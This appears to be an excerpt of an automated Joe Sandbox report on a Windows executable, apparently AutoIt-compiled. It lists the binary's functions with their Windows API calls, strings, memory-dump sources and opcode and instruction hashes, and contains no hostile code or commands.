                                                                                              • Instruction ID: d92c7102fc6d098775a0f5363b9b5483e5b10d08a1c29475ed017091780ded1e
                                                                                              • Opcode Fuzzy Hash: 80714434994c9102abdbbcfc383ede657addd51ae4f203e3d2298efcf25a3187
                                                                                              • Instruction Fuzzy Hash: 3301AD32905711ABC721ABA698497DE7BB0AB04724F15416BF950A7381CB3CAAC1CFDD
                                                                                              APIs
                                                                                              • InterlockedExchange.KERNEL32(?,?), ref: 0044B655
                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 0044B666
                                                                                              • TerminateThread.KERNEL32(?,000001F6), ref: 0044B674
                                                                                              • WaitForSingleObject.KERNEL32(?,000003E8,?,000001F6), ref: 0044B682
                                                                                                • Part of subcall function 00432614: CloseHandle.KERNEL32(00000000,00000000,?,0044B68E,00000000,?,000003E8,?,000001F6), ref: 00432622
                                                                                              • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B697
                                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 0044B69E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                              • String ID:
                                                                                              • API String ID: 3495660284-0
                                                                                              • Opcode ID: 80b6dccbd1e5d9cd8e45b8a26e63ab1859993381d971fdb3943588aa16a91346
                                                                                              • Instruction ID: c0d5b59c8b9084ef0a5212f46b36de0b3fb5a8468090cd03c061fc2099eb7203
                                                                                              • Opcode Fuzzy Hash: 80b6dccbd1e5d9cd8e45b8a26e63ab1859993381d971fdb3943588aa16a91346
                                                                                              • Instruction Fuzzy Hash: A8F0AF72141201BBD210AB64EE8CDAFB77CFF88311F40092AFA0192560CBB4E420CBB6
                                                                                              APIs
                                                                                              • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00410AE8
                                                                                              • MapVirtualKeyW.USER32(00000010,00000000), ref: 00410AF0
                                                                                              • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00410AFB
                                                                                              • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00410B06
                                                                                              • MapVirtualKeyW.USER32(00000011,00000000), ref: 00410B0E
                                                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 00410B16
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Virtual
                                                                                              • String ID:
                                                                                              • API String ID: 4278518827-0
                                                                                              • Opcode ID: c23d3b718cf4e8061cd741903dec6eccba5b4b0418601ad509713896de31bf0c
                                                                                              • Instruction ID: ec5b0e47a8727e2ef01e8325cfcf1e1c5a721ad9102a6d662b709b351e7b749c
                                                                                              • Opcode Fuzzy Hash: c23d3b718cf4e8061cd741903dec6eccba5b4b0418601ad509713896de31bf0c
                                                                                              • Instruction Fuzzy Hash: 79016770106B88ADD3309F668C84B47FFF8EF95704F01491DD1D507A52C6B5A84CCB69
                                                                                              APIs
                                                                                              • ___set_flsgetvalue.LIBCMT ref: 004151C0
                                                                                                • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                                                                • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                                                              • ___fls_getvalue@4.LIBCMT ref: 004151CB
                                                                                                • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                                                              • ___fls_setvalue@8.LIBCMT ref: 004151DD
                                                                                              • GetLastError.KERNEL32(00000000,?,00000000), ref: 004151E6
                                                                                              • ExitThread.KERNEL32 ref: 004151ED
                                                                                              • __freefls@4.LIBCMT ref: 00415209
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Value$ErrorExitLastThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                                                              • String ID:
                                                                                              • API String ID: 442100245-0
                                                                                              • Opcode ID: 3ee415d2c127bcf6c5e710345aa78d19554ad97a0662bc484850007a9fc41a8b
                                                                                              • Instruction ID: 28e435cdead01fd65333368df2891c86ea6a44e569ea48f613a140ff37384f5b
                                                                                              • Opcode Fuzzy Hash: 3ee415d2c127bcf6c5e710345aa78d19554ad97a0662bc484850007a9fc41a8b
                                                                                              • Instruction Fuzzy Hash: FEF01975544700AFC704BF76C54D9CE7BB99F94349720845EB80887222DA3CD8C2C669
                                                                                              APIs
                                                                                                • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                                                                • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                                                              • GetMenuItemInfoW.USER32(?,00000000), ref: 0045F85C
                                                                                              • _wcslen.LIBCMT ref: 0045F94A
                                                                                              • SetMenuItemInfoW.USER32(00000011,00000000,00000000,?), ref: 0045F9AE
                                                                                                • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                              • SetMenuDefaultItem.USER32(00000000,000000FF,00000000,?,00000000), ref: 0045F9CA
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: ItemMenu$Info_wcslen$Default_malloc_wcscpy
                                                                                              • String ID: 0
                                                                                              • API String ID: 621800784-4108050209
                                                                                              • Opcode ID: ba56779765e6f71d67f6246429d0af9e67b9def047912433c0c15b7e926c8fa5
                                                                                              • Instruction ID: 8916cda2fcff4f3da81aa675480f1736598f59ba0f795e6899437ff2d0190f01
                                                                                              • Opcode Fuzzy Hash: ba56779765e6f71d67f6246429d0af9e67b9def047912433c0c15b7e926c8fa5
                                                                                              • Instruction Fuzzy Hash: E061EDB1604301AAD710EF69D885B6B77A4AF99315F04493FF98087292E7BCD84CC79B
                                                                                              APIs
                                                                                                • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                              • SetErrorMode.KERNEL32 ref: 004781CE
                                                                                              • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00478387
                                                                                                • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                                                              • SetErrorMode.KERNEL32(?), ref: 00478270
                                                                                              • SetErrorMode.KERNEL32(?), ref: 00478340
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorMode$AttributesFile_memmove_wcslen
                                                                                              • String ID: \VH
                                                                                              • API String ID: 3884216118-234962358
                                                                                              • Opcode ID: 178592a45c440348c39a3b7bd59973aab5981f95bb0f1257baca06643fcd57b5
                                                                                              • Instruction ID: 3f1cdca54a202f1bd1938e87a451cd9606667cca5306a7eaf6ab6c0a6d737147
                                                                                              • Opcode Fuzzy Hash: 178592a45c440348c39a3b7bd59973aab5981f95bb0f1257baca06643fcd57b5
                                                                                              • Instruction Fuzzy Hash: F9619F715043019BC310EF25C585A5BB7E0BFC8708F04896EFA996B392CB76ED45CB96
                                                                                              APIs
                                                                                              • LoadLibraryA.KERNEL32(?), ref: 00434B10
                                                                                              • GetProcAddress.KERNEL32(?,AU3_GetPluginDetails), ref: 00434B88
                                                                                              • FreeLibrary.KERNEL32(?), ref: 00434B9F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Library$AddressFreeLoadProc
                                                                                              • String ID: AU3_GetPluginDetails$Wu
                                                                                              • API String ID: 145871493-136108093
                                                                                              • Opcode ID: 525874d34911f66d3e6dd89a42f64d0fb8abb6a055dcd3ee386d4a3c405b38ac
                                                                                              • Instruction ID: fc8523f5daf935d660d2a9c884068eb8da3e2fc1adb06f3317e0194b47a185ca
                                                                                              • Opcode Fuzzy Hash: 525874d34911f66d3e6dd89a42f64d0fb8abb6a055dcd3ee386d4a3c405b38ac
                                                                                              • Instruction Fuzzy Hash: C24107B9600605EFC710DF59D8C0E9AF7A5FF89304B1082AAEA1A8B311D735FD52CB95
                                                                                              APIs
                                                                                              • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00448539
                                                                                              • IsMenu.USER32(?), ref: 0044854D
                                                                                              • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0044859B
                                                                                              • DrawMenuBar.USER32 ref: 004485AF
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Menu$Item$DrawInfoInsert
                                                                                              • String ID: 0
                                                                                              • API String ID: 3076010158-4108050209
                                                                                              • Opcode ID: 1799694fe08fa7a149e3e917ddeca428ef12783b8609c92dee7a023332204936
                                                                                              • Instruction ID: 7b58e0297b022ec9ba855d833b0382692745775969200e6848d17b537ef0d45f
                                                                                              • Opcode Fuzzy Hash: 1799694fe08fa7a149e3e917ddeca428ef12783b8609c92dee7a023332204936
                                                                                              • Instruction Fuzzy Hash: 1F417975A00209AFEB10DF55D884B9FB7B5FF59300F14852EE9059B390DB74A845CFA8
                                                                                              APIs
                                                                                                • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                              • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00469D69
                                                                                              • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00469D7C
                                                                                              • SendMessageW.USER32(?,00000189,00000000,00000000), ref: 00469DAC
                                                                                                • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                                • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$_memmove_wcslen
                                                                                              • String ID: ComboBox$ListBox
                                                                                              • API String ID: 1589278365-1403004172
                                                                                              • Opcode ID: 4395ff4c2c8cdf0c8fa99ec605851f177d12593d5a8a66f2884a0b9051c55526
                                                                                              • Instruction ID: b025c67d46b61e1fa51b41144ded2117d8c1ab71acdc4e5cb50a5164a05e923b
                                                                                              • Opcode Fuzzy Hash: 4395ff4c2c8cdf0c8fa99ec605851f177d12593d5a8a66f2884a0b9051c55526
                                                                                              • Instruction Fuzzy Hash: 8D31287160010477DB10BB69CC45BEF775C9F86324F10852FF918AB2D1DABC9E4583A6
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Handle
                                                                                              • String ID: nul
                                                                                              • API String ID: 2519475695-2873401336
                                                                                              • Opcode ID: efdaae6ab43bf4356d88622121a7e42c7f624cc6de1d12637521731ec53ca4c5
                                                                                              • Instruction ID: 058e2060cb23de8d889deff533ab301820a4ae088d702658d54b05e79d5a48de
                                                                                              • Opcode Fuzzy Hash: efdaae6ab43bf4356d88622121a7e42c7f624cc6de1d12637521731ec53ca4c5
                                                                                              • Instruction Fuzzy Hash: 84319571500204ABEB20DF68DC46BEB77A8EF04721F104A4EFD50973D1E7B59A50CBA5
                                                                                              APIs
                                                                                              • GetStdHandle.KERNEL32(000000F6), ref: 0044337D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Handle
                                                                                              • String ID: nul
                                                                                              • API String ID: 2519475695-2873401336
                                                                                              • Opcode ID: 97b946d9a765a46b1e85699804a5cf49c651f34dfecb3a2317456e71fe30ed78
                                                                                              • Instruction ID: 7fb8f1e98e57093f7bc771e71f756598ee5282d4f5ffeaa4ddc08f3ab3272662
                                                                                              • Opcode Fuzzy Hash: 97b946d9a765a46b1e85699804a5cf49c651f34dfecb3a2317456e71fe30ed78
                                                                                              • Instruction Fuzzy Hash: 05219331600204ABE720DF689C49FAB77A8EF55731F20474EFDA0972D0EBB59A50C795
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: SysAnimate32
                                                                                              • API String ID: 0-1011021900
                                                                                              • Opcode ID: 8caf53187f6e77aecacb49307b2e697766faa1bc511b1160dce697a174d3407c
                                                                                              • Instruction ID: b1a10ecfd0a3fc3d2af2854cd73c9de1262d8b9fd4b2252518a975ef6c54cff1
                                                                                              • Opcode Fuzzy Hash: 8caf53187f6e77aecacb49307b2e697766faa1bc511b1160dce697a174d3407c
                                                                                              • Instruction Fuzzy Hash: 0D21C975600205ABFB149EA9EC81FAB73DCEB95324F20471BF711972C0D279EC518768
                                                                                              APIs
                                                                                                • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                                • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                                • Part of subcall function 0043646A: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00436489
                                                                                                • Part of subcall function 0043646A: GetWindowThreadProcessId.USER32(?,00000000), ref: 0043649C
                                                                                                • Part of subcall function 0043646A: GetCurrentThreadId.KERNEL32 ref: 004364A3
                                                                                                • Part of subcall function 0043646A: AttachThreadInput.USER32(00000000), ref: 004364AA
                                                                                              • GetFocus.USER32 ref: 0046157B
                                                                                                • Part of subcall function 004364B5: GetParent.USER32(?), ref: 004364C3
                                                                                                • Part of subcall function 004364B5: GetParent.USER32(?), ref: 004364CF
                                                                                              • GetClassNameW.USER32(?,?,00000100), ref: 004615C4
                                                                                              • EnumChildWindows.USER32(?,Function_00045B98,?), ref: 004615EF
                                                                                              • __swprintf.LIBCMT ref: 00461608
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Thread$Parent$AttachChildClassCurrentEnumFocusInputMessageNameProcessSendTimeoutWindowWindows__swprintf_memmove_wcslen
                                                                                              • String ID: %s%d
                                                                                              • API String ID: 2645982514-1110647743
                                                                                              • Opcode ID: 964dbc2a73d3b51658c129c0940897b8911b785c40af9afe88b96a44e5c449bd
                                                                                              • Instruction ID: 8eac61321038dbd32bfe14263504560db7c98c8fbeeeb2eb49a46d34c9d63f73
                                                                                              • Opcode Fuzzy Hash: 964dbc2a73d3b51658c129c0940897b8911b785c40af9afe88b96a44e5c449bd
                                                                                              • Instruction Fuzzy Hash: 272180756007096BD610AF69DC89FAF73A8FB88704F00841FF918A7241DAB8A9418B69
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 0beeaaa579c9339ee211e6c40176bce708d39a94b7630d2852c1f2343b6e5e4f
                                                                                              • Instruction ID: b0f148a0463f8e77612455c4d0488571574065cadd758f34d18f988e9301810f
                                                                                              • Opcode Fuzzy Hash: 0beeaaa579c9339ee211e6c40176bce708d39a94b7630d2852c1f2343b6e5e4f
                                                                                              • Instruction Fuzzy Hash: 2A819F74600604BFEB24CF95C994FBB7B68EF59350F10804EF8959B341E6B8AC45CB6A
                                                                                              APIs
                                                                                              • GetCurrentProcessId.KERNEL32(?), ref: 0047584D
                                                                                              • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0047585B
                                                                                              • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0047587F
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00475A4D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Process$CloseCountersCurrentHandleOpen
                                                                                              • String ID:
                                                                                              • API String ID: 3488606520-0
                                                                                              • Opcode ID: ce4ed15879a0d4705bc9675b55154bd71a0022cbb1f9dd3a70cee976304ba055
                                                                                              • Instruction ID: 747e8e91012d04cc7bcfbda4f2b49d0ca9967bea8b965680eccea6cdbc9dea0c
                                                                                              • Opcode Fuzzy Hash: ce4ed15879a0d4705bc9675b55154bd71a0022cbb1f9dd3a70cee976304ba055
